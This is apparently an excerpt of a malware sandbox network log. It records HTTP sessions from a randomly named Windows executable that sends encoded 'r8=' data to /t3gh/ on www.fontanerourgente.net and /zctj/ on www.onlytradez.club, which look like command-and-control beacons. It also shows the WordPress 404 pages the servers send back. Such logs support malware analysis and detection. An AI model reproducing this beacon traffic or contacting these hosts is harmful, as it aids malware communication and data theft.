                                        Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
                                        Sep 3, 2024 13:54:05.265662909 CEST | 224 | IN | Data Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
                                        Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1e
                                        Sep 3, 2024 13:54:05.265672922 CEST | 1236 | IN | Data Raw: 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d
                                        Data Ascii: m}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-qu
                                        Sep 3, 2024 13:54:05.265683889 CEST | 224 | IN | Data Raw: 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d
                                        Data Ascii: color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}:root :where(.wp-block-template-
                                        Sep 3, 2024 13:54:05.265923023 CEST | 1236 | IN | Data Raw: 70 61 72 74 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e
                                        Data Ascii: part.has-background){margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</style><style id='classic-theme-styles-inline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        7 | 192.168.2.4 | 49744 | 37.187.158.211 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:06.732491970 CEST | 10869 | OUT | POST /t3gh/ HTTP/1.1
                                        Host: www.fontanerourgente.net
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.fontanerourgente.net
                                        Referer: http://www.fontanerourgente.net/t3gh/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 4a 54 50 6a 63 50 61 79 45 4a 59 37 72 69 2f 43 74 30 58 79 30 78 73 4b 58 71 6c 2f 36 41 43 57 57 32 61 6f 5a 4b 51 38 64 6f 78 53 56 31 36 79 44 6e 34 49 6e 77 74 6c 68 37 70 62 31 78 79 4a 6a 72 76 59 44 46 59 5a 65 63 55 61 34 4c 69 4b 71 53 44 54 50 70 4a 73 76 46 52 4a 54 50 42 70 46 79 69 59 2f 42 71 69 36 46 52 74 6b 67 38 64 70 45 6b 47 2f 43 72 31 7a 44 38 6c 58 53 76 2b 64 64 66 66 67 35 6e 53 30 6c 52 59 69 42 61 49 31 32 30 41 51 56 6b 4f 6c 43 65 42 45 33 6f 37 2f 61 70 39 48 6f 2f 35 65 54 58 70 70 39 41 4a 61 2b 64 44 56 75 41 53 64 48 38 30 70 75 36 47 7a 4f 38 4c 73 51 6a 4e 73 67 46 77 67 4a 45 43 6d 73 68 30 4b 68 66 67 42 61 65 73 69 52 59 69 37 44 62 76 4d 56 6b 53 49 66 68 61 48 50 58 4c 62 79 46 32 47 32 34 2f 5a 6b 57 41 44 7a 62 4b 31 6f 47 64 72 68 70 53 54 4e 38 4c 67 72 6d 51 74 65 5a 69 6d 50 74 4c 4f 31 62 70 58 4c 63 33 38 66 42 6e 37 [TRUNCATED]
                                        Data Ascii: r8=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxJTPjcPayEJY7ri/Ct0Xy0xsKXql/6ACWW2aoZKQ8doxSV16yDn4Inwtlh7pb1xyJjrvYDFYZecUa4LiKqSDTPpJsvFRJTPBpFyiY/Bqi6FRtkg8dpEkG/Cr1zD8lXSv+ddffg5nS0lRYiBaI120AQVkOlCeBE3o7/ap9Ho/5eTXpp9AJa+dDVuASdH80pu6GzO8LsQjNsgFwgJECmsh0KhfgBaesiRYi7DbvMVkSIfhaHPXLbyF2G24/ZkWADzbK1oGdrhpSTN8LgrmQteZimPtLO1bpXLc38fBn7s/VzAxFFw0gtjDSn1fLwSrQ1DPX1HmsCGL0U0VM1NaymNIMkyynYTMBf1tkjAxXpN83/BWwC92SUao/Y/ODSX7O/7Wqh63RtC6bkZ0gYRPy0/ZVo7s4OujFEdFm1UdJxXsYpafdamNlV+PxqKRTTs1+y8KtCaSM8FKNR7mSDEywyspHocJHH2F2ag3y59AGjdypbKoXDArESOv7FMGuyCfbCrR8LYQlC+90G1hU83sIMIQfJm6y8lH9YcbgSMMXmACPZB/1FiqUomAB1JuzXij7bwH+zCMdNgbLy2Br/WntWtO0q16ygDc7DAxtkI0z2AiWY0sCFrp60ENfQKyXJ04uSDSO4zQ6g8JfL9X8EwXD2rALid6rr9XmHoD/WX5Jt0rkEtsLO4A7RuPMBJhVjd3V4U7mDoSmJvtr07Yc00vJ+Wbh0VvWXn/jvzR/FeetMAW+I4zhWt0LGFqba1PKjPB3TCabXcMzr+U9pE4egB1fr7Gt5F+YfkEwCy+p+20kBsz8RnQNmAJuwvmpnb+iPxJHDcC39XwrVFyrIsRwNr//t5Rs5cNShgiMCUdwDNjmiXkO+qCJU1z6mHrvTfrOO8U9Y5ZufUxuuZznW+8/YT8BFb9zr168cM3n/XwglB0Q4nxty5D74nuSegnjgozttSiSOiHksK2UrnT [TRUNCATED]
                                        Sep 3, 2024 13:54:07.708841085 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:07 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                        Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Página no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                                        Sep 3, 2024 13:54:07.708879948 CEST | 1236 | IN | Data Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                                        Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                                        Sep 3, 2024 13:54:07.708893061 CEST | 1236 | IN | Data Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                                        Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                                        Sep 3, 2024 13:54:07.708964109 CEST | 1236 | IN | Data Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                                        Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                                        Sep 3, 2024 13:54:07.708975077 CEST | 1236 | IN | Data Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
                                        Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
                                        Sep 3, 2024 13:54:07.708986998 CEST | 1120 | IN | Data Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                                        Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                                        Sep 3, 2024 13:54:07.708998919 CEST | 1236 | IN | Data Raw: 70 61 72 74 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e
                                        Data Ascii: part.has-background){margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</style><style id='classic-theme-styles-inline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;
                                        Sep 3, 2024 13:54:07.709011078 CEST | 1116 | IN | Data Raw: 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 64 61 72 6b 2d 67 72 61 79 3a 20 23 32 38 33 30 33 44 3b 2d 2d 77
                                        Data Ascii: --preset--color--vivid-purple: #9b51e0;--wp--preset--color--dark-gray: #28303D;--wp--preset--color--gray: #39414D;--wp--preset--color--green: #D1E4DD;--wp--preset--color--blue: #D1DFE4;--wp--preset--color--purple: #D1D1E4;--wp--preset--color--
                                        Sep 3, 2024 13:54:07.709079981 CEST | 1236 | IN | Data Raw: 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d
                                        Data Ascii: 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(
                                        Sep 3, 2024 13:54:07.709139109 CEST | 1236 | IN | Data Raw: 30 64 65 67 2c 20 23 45 45 45 41 44 44 20 30 25 2c 20 23 45 34 44 31 44 31 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 70 75 72 70 6c 65 2d 74 6f 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64
                                        Data Ascii: 0deg, #EEEADD 0%, #E4D1D1 100%);--wp--preset--gradient--purple-to-red: linear-gradient(160deg, #D1D1E4 0%, #E4D1D1 100%);--wp--preset--gradient--red-to-purple: linear-gradient(160deg, #E4D1D1 0%, #D1D1E4 100%);--wp--preset--font-size--small: 1
                                        Sep 3, 2024 13:54:07.714015961 CEST | 1236 | IN | Data Raw: 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 7b 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c
                                        Data Ascii: {display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:wher


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.2.4 | 49745 | 37.187.158.211 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:09.284306049 CEST | 490 | OUT | GET /t3gh/?r8=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.fontanerourgente.net
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:54:10.176074028 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:09 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                        Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Página no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                                        Sep 3, 2024 13:54:10.176091909 CEST | 1236 | IN | Data Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                                        Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                                        Sep 3, 2024 13:54:10.176103115 CEST | 448 | IN | Data Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                                        Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                                        Sep 3, 2024 13:54:10.176197052 CEST | 1236 | IN | Data Raw: 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65
                                        Data Ascii: ON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Work
                                        Sep 3, 2024 13:54:10.176208019 CEST | 224 | IN | Data Raw: 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d
                                        Data Ascii: ttings);</script><style id='wp-emoji-styles-inline-css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                                        Sep 3, 2024 13:54:10.176213980 CEST | 1236 | IN | Data Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
                                        Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
                                        Sep 3, 2024 13:54:10.176219940 CEST | 224 | IN | Data Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
                                        Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1e
                                        Sep 3, 2024 13:54:10.176335096 CEST | 1236 | IN | Data Raw: 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d
                                        Data Ascii: m}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-qu
                                        Sep 3, 2024 13:54:10.176347971 CEST | 1236 | IN | Data Raw: 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d
                                        Data Ascii: color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}:root :where(.wp-block-template-part.has-background
                                        Sep 3, 2024 13:54:10.176361084 CEST | 1236 | IN | Data Raw: 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b
                                        Data Ascii: lor--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vi
                                        Sep 3, 2024 13:54:10.181113958 CEST | 1236 | IN | Data Raw: 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36
                                        Data Ascii: rum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(15


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        9 | 192.168.2.4 | 49746 | 167.172.133.32 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:15.304673910 CEST | 752 | OUT | POST /zctj/ HTTP/1.1
                                        Host: www.onlytradez.club
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
